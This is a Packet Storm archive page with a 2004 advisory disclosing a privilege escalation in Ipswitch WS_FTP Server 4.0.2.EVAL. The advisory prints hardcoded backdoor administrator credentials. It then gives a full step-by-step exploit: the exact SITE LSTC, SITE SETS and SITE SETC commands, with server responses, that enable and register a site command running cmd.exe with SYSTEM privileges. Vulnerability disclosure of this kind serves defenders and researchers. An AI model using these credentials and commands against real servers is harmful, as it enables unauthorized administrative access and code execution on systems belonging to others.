exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wsftp402eval3.txt

wsftp402eval3.txt
Posted Mar 23, 2004
Authored by Hugh Mann

Ipswitch WS_FTP server version 4.0.2.EVAL allows for a local attacker with program execution privileges to run anything with SYSTEM privileges. Full step-by-step exploitation given.

tags | exploit, local
SHA-256 | 09db33767583c0197cf2fc533a27f68d312a5b5a994ac463fa779980c06c0d47

wsftp402eval3.txt

Change Mirror Download
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advisory Name: Open the WS_FTP Server backdoor to SYSTEM
Impact : Privilege escalation
Discovered by: Hugh Mann hughmann@hotmail.com
Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Description
~~~~~~~~~~~
Any local user or any remote user who can execute programs on the FTP server
as any user can start programs on the FTP server with the SYSTEM privilege.

Details
~~~~~~~
There are two WS_FTP Server options only the FTP system administrator can
change. When enabled a FTP system administrator can edit user-defined SITE
FTP commands. These user-defined SITE commands execute a program of the FTP
system admin's choice. To protect the FTP sites, these options can only be
controlled by a local FTP system administrator using the iftpmgr.exe
program. It's not possible for a remote FTP system admin to enable these
options through the iftpmgr.exe program. However, it's possible for a FTP
system administrator to enable these options with a special WS_FTP Server
SITE command. Ipswitch forgot to mask out the bits that enable these options
before saving the new Flags when it receives a new SITE SETS (Set Site
Options) command from a remote FTP system administrator.

A "remote" FTP system admin is any FTP system admin using FTP/TELNET to
connect to the server, which includes local users. If the remote user
doesn't have the FTP system admin password but can run a program on the FTP
server as any user, or if the user is a local user, the user can log in as
the FTP system administrator by using a backdoor.

FTP System Administrator backdoor: Any local user, or any remote user who
can run programs on the FTP server as any user, can log in as the FTP System
Administrator by using a backdoor.

RealName: Local Session Manager
Username: XXSESS_MGRYY
Password: X#1833

The user must have an IP equal to 127.0.0.1 and must connect to server IP
127.0.0.1 or the login will fail.

Exploit
~~~~~~~
Use telnet/ftp to log in as the FTP system admin or use the backdoor. Enable
remote editing of SITE cmds/events (exec files). This is off by default, but
can be enabled by a remote ftp admin. First use the SITE List Site Options
command:

SITE LSTC
220
C:\iFtpSvc<\t>C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>0<\t>1460<\t>0<\t>16384<\t>C:\iFtpSvc\Security<\t>0

<\t> means tab, or byte 0x09.

Write down the 2nd to 8th site options you find there. Change the 5th Flags
option by OR'ing it with 0x180. Now put the 2nd to 8th options on the next
line, each option separated by a tab, except for the first option right
after "SITE SETS" which should have a space just before it:

SITE SETS C:\iFtpSvc<\t>C:\iFtpSvc\Logs<\t>21<\t>384<\t>1460<\t>0<\t>16384
220 options set

Now iftpmgr.exe can be used to remotely control all site options. I'll show
how to manually add a SITE cmd we can use without using iftpmgr.exe. The
command to do that is:

SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified

<HostName> is the first name displayed before you log in to the FTP. 3V1L is
the name of the new SITE command. Flags = 16 means write output to the
screen.

SITE 3V1L
200-Command Started
200-yup
200 SITE command execution successful

_________________________________________________________________
Find a broadband plan that fits. Great local deals on high-speed Internet
access. http://click.atdmt.com/AVE/go/onm00200360ave/direct/01/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close